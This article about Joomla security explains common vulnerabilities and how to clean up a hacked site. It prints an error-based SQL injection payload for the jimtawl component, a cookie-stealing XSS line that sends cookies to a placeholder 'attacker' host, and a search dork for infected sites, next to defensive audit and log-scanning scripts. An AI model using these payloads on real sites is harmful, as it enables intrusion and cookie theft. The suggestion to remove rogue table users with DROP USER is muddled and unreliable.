
Joomla Hacked? These Joomla Vulnerabilities Could be the Reason

Joomla is one of the many free, open-source content management systems (CMS), and it has long helped people build and maintain robust websites. There is a long-standing debate about which CMS is best, WordPress or Joomla; however, Joomla outperforms its rival in flexibility and security. It also powers some of your favorites, such as Pizza Hut and Harvard University. Because it is open source, its source code is publicly available, and more developers looking through the code means more vulnerabilities discovered in the Joomla CMS. Owing to its popularity, a Joomla hack is relatively common these days. Even this year, multiple Joomla security issues have been discovered, including Joomla XSS, file intrusion and Joomla SQL injection. These issues have kept security teams busy throughout the year, and they make website cleanup a tedious task as more and more bugs are discovered. According to the official Joomla website,

A CMS-powered website has all the ingredients for an IT security nightmare: it is publicly accessible, it’s running on powerful machines with great connectivity and the underlying system is used countless times around the globe, making it an attractive target for attackers.

Signs of a Joomla Hack

  • A Google search shows ‘This site may be hacked’ in the meta description.
  • Cryptocurrency mining in the background.
  • DNS redirection for your website.
  • Index page defaced or replaced by a Joomla hack.
  • You get logged out of the admin account.
  • New admins appear.
  • Page loading gets slow or bulky.
  • Previously non-existent spam starts to appear on your site. This spam also includes ads and unwanted redirects.
  • The site gets blacklisted by Google for ‘malware’ or ‘phishing’.
  • Unnatural traffic hike on your site. You can check all this using the Google webmaster tools.
  • The CMS or other software may be broken, especially the firewall!


Joomla Security Issues

1) Joomla Vulnerability: Joomla SQL Injection

SQL injection is one of the significant Joomla security issues, and Joomla has a long history of SQL vulnerabilities. An SQL injection is the result of unsanitized input: you trust the user with input, and all kinds of things can go wrong. Joomla SQL injection dates back as far as 2008, when it was due to the Ice Gallery (com_ice) component 0.5 beta 2 for Joomla. This year too, multiple Joomla SQL injection points have been found. The latest Joomla SQL injections this year include CVE-2018-8045. Multiple vulnerable components were discovered this year; to simplify things, we will focus on the latest one. The ‘jimtawl’ component of Joomla is vulnerable to SQL injection. The vulnerability resides in the parameter ‘id’. A simple request would look like this:

http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]

The problem arises when a user provides unsanitized input after the parameter ‘id’. Things can escalate from there: the parameter can be exploited using an error-based ‘AND’ statement.

' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari

The code given above can be used to exploit it. It prints the user info and database version of the server, and it can be tweaked to execute all kinds of database operations. Details regarding this were recently released on exploit-db, which means they are publicly visible to all. So even a noob can cause a Joomla hack, especially using tools like sqlmap, which would automate the whole process. This component is therefore one of the Joomla security issues on your site. Avoid it until it is patched!

2) Joomla Vulnerability: Joomla XSS

Cross-site scripting (XSS) attacks are frequent on Joomla websites, and multiple XSS Joomla security issues have been found this year. A Joomla XSS is quite similar to a Joomla SQL injection; the difference is that it is exploited using JavaScript. Joomla is aware of this and therefore has some checks and balances: XSS filters that strip out harmful input. However, CVE-2018-11326 was all about bypassing these filters, and it was severe because it was a persistent XSS. The latest one in this long list is CVE-2018-12711, where the ‘language switcher module’ is responsible. The URL of some languages can be injected with JavaScript.

<script>window.location='http://attacker/cookie='+document.cookie</script>

For instance, this piece of code steals the user cookie. This one is a reflected XSS, which means the attacker can create a special request. Sending this request can be used for phishing or cookie stealing. Further, tools like Xsser can help to automatically detect and exploit websites.

3) Joomla Vulnerability: Javascript Injection

When it comes to Joomla, JavaScript helps to perform powerful and dynamic tasks. Sometimes, due to faulty coding, there is scope for a JavaScript injection in Joomla. A JavaScript injection basically helps to manipulate the website. Moreover, an attacker can use it to steal cookies and change the way your site looks. A simple manual test for JavaScript injection can be done. In the address bar of your site, type:

javascript:alert('Executed!');

If you see a message box saying ‘Executed’, then your site is vulnerable. A JavaScript injection can have deadly consequences for your website. It can:

  • Insert fake forms on the site.
  • Steal user cookies.
  • Change the complete appearance of the site.
  • Be used for injecting spam.
  • Be used for fake redirects.

A JavaScript injection is simply a lack of input validation. When it comes to Joomla, don’t rely on client-side execution of the code. Other parameters, such as input fields, could be vulnerable to JavaScript injection too, so the best practice is to use automated modules for testing.

4) Joomla Vulnerability: Phishing

Phishing attacks are often deployed to commit a Joomla hack. A phishing attack makes a legitimate user believe in fake pages. The unwary user then submits sensitive info to the page. This info is then read by the attacker to gain access to the system. Multiple methods are used for phishing like:

  • Fake login pages.
  • Phishing Emails.
  • Phishing phone calls.
  • Fake update pages etc.
  • Using Joomla security issues like XSS for phishing.

A new type of phishing attack is on the rise nowadays. First, it shows a login page in a minimized container.

[Image: Joomla hack phishing example]

This looks like any other legitimate page. However, the trick lies in minimizing the page. The user can see only the first few words of the URL. So he/she may assume the page to be legitimate.

[Image: Joomla hack phishing page]

However, when the full URL is exposed, the scenario is different. It was a fake page set up by MaliciousSITE.com. It is no big deal for it to gain an HTTPS certificate. Moreover, certain advanced tricks like URL encoding come in handy for attackers. This makes the page look just like the real page. So always beware of opening any Joomla login links!

5) Joomla Vulnerability: Pharma Hack

Joomla websites are good targets for SEO spammers, mostly owing to their popularity. Spammers use these websites to spread their ads, mostly for pharmaceutical products, especially pills. The bulk of SEO-spam-infected websites can be searched on Google. A simple Google dork like inurl: "viagra" "powered by Joomla" can do the trick. The search query then shows something like this.

[Image: Joomla Pharma Hack search results]

As we can see, all these Joomla websites are infected with SEO spam. Their meta description shows ‘viagra’ ads. Multiple Joomla vulnerabilities can be used to inject this spam; it could be a code injection or any other Joomla hack. However, the results are devastating for the website, which loses its reputation and user trust. It can be hard to recover search rankings after a Pharma Hack.

6) Joomla Vulnerability: Misconfigured Server

Sometimes, in the case of a Joomla hack, a faulty server could be responsible. Often a lack of proper permissions on the server can wreak havoc. In Joomla installations, by default, the .htaccess file has write permissions. This could allow the attacker to gain sensitive info. Multiple things can go wrong with servers, such as:

  • Weak credentials.
  • Open ports.
  • Forgotten sub-domains.
  • Outdated installations.
  • Unprotected DNS server.
  • Multiple websites sharing the same space without subnetting. So if one is infected it spreads.

So, the server installation needs to be checked from time to time. Weak file permissions and errors expose sensitive info. Therefore server security is vital to avoid a Joomla hack.


Cleaning a Joomla Hack

1) Fixing Joomla Hack: Database Cleanup

First, begin by cleaning the infected database. A Joomla SQL injection can create new database users. To look for new users created after a specific date, use the following code:

-- Replace My_Date with a date written to match the format, for example 'June 01 2018'
SELECT * FROM users AS u
WHERE u.created > UNIX_TIMESTAMP(STR_TO_DATE('My_Date', '%M %d %Y'));

Once rogue users are found, delete them using the SQL statement DROP USER. In addition, to avoid future infections:

  • Sanitize the user input.
  • Restrict database permissions to the account.
  • Restrict database error disclosure to local only.
  • Use type casting wherever possible.

2) Fixing Joomla Hack: Securing the Server

Even when the installation is secure, faulty servers can cause a Joomla hack. Although there is a big list of Joomla security issues, certain key points to remember are:

  • Close any open ports.
  • Remove the unused subdomains.
  • Check regularly for configuration issues.
  • If you are sharing a server go for subnetting. Or use a VPN.
  • Block the error messages leaking info.
  • Give strong and random passwords to FTP accounts and database!
  • Make sure you use a firewall or some sort of security solution.

3) Fixing Joomla Hack: Setting Permissions

  • Primarily, ensure that no user can upload executables like .php, .aspx etc. Only image files are to be uploaded on the server.
  • Now set the file permissions on the server. Perhaps the most sensitive file is the .htaccess file, so set your .htaccess permission to 444 (r--r--r--) or maybe 440 (r--r-----).
  • Also, ensure that your PHP files cannot be overwritten. Therefore you need to set *.php to 444 (r--r--r--).
  • Most importantly, use popular extensions. Joomla is a pretty big CMS, so alternatives are always there. Popular extensions get updates faster in case of a vulnerability, so try to go with the popular choice most of the time!
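A read-only audit of the permission rules above, as an added example that is not from the original article: it walks a web root and reports .htaccess and PHP files that are still writable, plus script files sitting in an upload directory. The `images` upload directory name, the script-extension list and the function name are assumptions; adjust them for your installation.

```python
import os
import stat
import sys

# Assumptions for this example: adjust both to match your installation.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar", ".aspx", ".asp", ".jsp", ".cgi"}
UPLOAD_DIRS = ("images",)  # top-level directories that should hold uploads only
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def audit(webroot):
    """Return a sorted list of (relative_path, octal_mode, finding) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        in_upload = rel_dir.split(os.sep)[0] in UPLOAD_DIRS
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # symlink modes say nothing about the target file
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            ext = os.path.splitext(name)[1].lower()
            if in_upload and ext in SCRIPT_EXTS:
                findings.append((rel, oct(mode), "script in upload directory"))
            if name == ".htaccess" and mode not in (0o444, 0o440):
                findings.append((rel, oct(mode), ".htaccess should be 444 or 440"))
            elif ext == ".php" and mode & WRITE_BITS:
                # 444 means no write bit for owner, group or others
                findings.append((rel, oct(mode), "PHP file is writable"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding, sep="\t")
```

The script only reports; it changes no permissions, so it is safe to run against a live web root before deciding what to chmod.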

4) Fixing Joomla Hack: Check Modified Files

Most of the time, hackers modify your files to inject spam. It can cause a real mess in your installation, and you might need a fresh installation. To avoid all this, ensure you always keep a backup. While analyzing the files after a Joomla hack, the diff command comes in handy: it helps to check for modified files. All the Joomla files are publicly available on GitHub, and they can be used for comparison. To check core file integrity with SSH commands:

$ mkdir joomla
$ cd joomla

Firstly, we created a directory named joomla and switched over to that.

$ wget https://github.com/joomla/joomla-cms/releases/download/3.6.4/Joomla_3.6.4-Stable-Full_Package.tar.gz

$ tar -zxvf Joomla_3.6.4-Stable-Full_Package.tar.gz

The wget command downloaded the Joomla files from GitHub. The second line of code then extracts them.

$ diff -r joomla-3.6.4 ./public_html

Finally, the diff command compares the contents. This time we are looking at the public_html directory. Similarly, you can check multiple directories. The files can also be checked manually: just log in using any FTP client and inspect them. SSH also enables you to list file modifications.

$ find ./ -type f -mtime -15

This command reveals the files modified in the last 15 days. Similarly, you can change the time window. Look out for any recently modified files!
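The same comparison as an added Python example (not from the original article), going a little beyond diff -r: it hashes a clean extracted release and the live web root, separates files that were modified from files that exist only on the live site, and marks which of those changed within the last 15 days. The function names and the two directory arguments are assumptions.

```python
import hashlib
import os
import sys
import time


def tree_hashes(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            hashes[os.path.relpath(path, root)] = digest
    return hashes


def compare(clean_root, live_root, days=15, now=None):
    """Classify live files against a clean copy of the same Joomla release."""
    clean, live = tree_hashes(clean_root), tree_hashes(live_root)
    cutoff = (now or time.time()) - days * 86400
    report = {"modified": [], "added": [], "missing": [], "recent": []}
    for rel, digest in sorted(live.items()):
        if rel not in clean:
            report["added"].append(rel)     # uploads, config, or a dropped file
        elif clean[rel] != digest:
            report["modified"].append(rel)  # core file no longer matches release
        else:
            continue
        # Same window as `find -mtime -15`, limited to files that differ
        if os.path.getmtime(os.path.join(live_root, rel)) >= cutoff:
            report["recent"].append(rel)
    report["missing"] = sorted(set(clean) - set(live))
    return report


if __name__ == "__main__" and len(sys.argv) == 3:
    for kind, paths in compare(sys.argv[1], sys.argv[2]).items():
        for rel in paths:
            print(kind, rel, sep="\t")
```

Files such as configuration.php and legitimate uploads will appear under "added"; the entries to look at first are added or modified PHP files that also appear under "recent".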


5) Fixing Joomla Hack: Check User Logs

System logs are the best tool to identify the cause of a Joomla hack. System logs record all the previous activities that took place. So whenever an XSS or SQL injection takes place, there is always a record of the request. Furthermore, the hackers tend to create new admin accounts. If you wish to check for any suspicious users, then:

  1. First, log in to your Joomla Dashboard.
  2. Now, click on Users and select Manage.
  3. Here, check for suspicious users, especially those recently registered.
  4. Now proceed to remove any unknown users.
  5. Also, check the Last Visit Date.
  6. Find out where the server logs are stored. Use them to identify Joomla SQL injection etc.
  7. If you see users logging in from unknown IPs, remove them.
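The log review in step 6, as an added example that is not part of the original article: a Python sketch that percent-decodes each request in an access log and flags the SQL injection and XSS markers quoted earlier on this page. The log lines are constructed samples in combined log format, and the `lang` parameter, the rule list and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2018:10:01:22 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jul/2018:10:02:41 +0000] "GET /index.php?option=com_jimtawl&view=user&task=user.edit&id=1%27%20AND%20EXTRACTVALUE(66,CONCAT(0x5c,USER()))--%20x HTTP/1.1" 500 312 "-" "sqlmap/1.2"
198.51.100.23 - - [12/Jul/2018:10:03:05 +0000] "GET /index.php?lang=%3Cscript%3Ewindow.location%3D1%3C%2Fscript%3E HTTP/1.1" 200 4801 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')

# Starter markers based on the payloads quoted in this article; extend for your site.
RULES = {
    "sqli": re.compile(r"extractvalue\s*\(|concat(_ws)?\s*\(|union\s+select|'\s*(and|or)\s", re.I),
    "xss": re.compile(r"<\s*script|javascript:|document\.cookie", re.I),
}

def decode(url, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still matched."""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url

def scan(log_text):
    """Return (ip, timestamp, status, rule, decoded_query) per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, url, status = m.groups()
        query = decode(url.partition("?")[2])
        for name, rule in RULES.items():
            if rule.search(query):
                hits.append((ip, ts, int(status), name, query))
    return hits

def by_source(hits):
    """Group matched rule names per client IP to see which hosts probed the site."""
    sources = {}
    for ip, _ts, _status, name, _query in hits:
        sources.setdefault(ip, set()).add(name)
    return sources

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The timestamps of the first hits give a starting point for the user review above: accounts registered shortly after them deserve the closest look.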

Moreover, use the Google diagnostic report to find the cause. It gives you a comprehensive view of your site. If your site is blacklisted, work closely with Google. The diagnostic report will give you the cause for blacklisting. Use it to find and weed out the infection!

6) Fixing Joomla Hack: Update

Most of the time a Joomla hack takes place due to unpatched files. Ensure all your modules are updated. Also, make sure the server software is up to date. Always turn on Automatic Updates. It may sound resource consuming but it is a secure practice. Joomla security issues can keep you busy. So, if you find it difficult to clean the Joomla hack, consult experts.
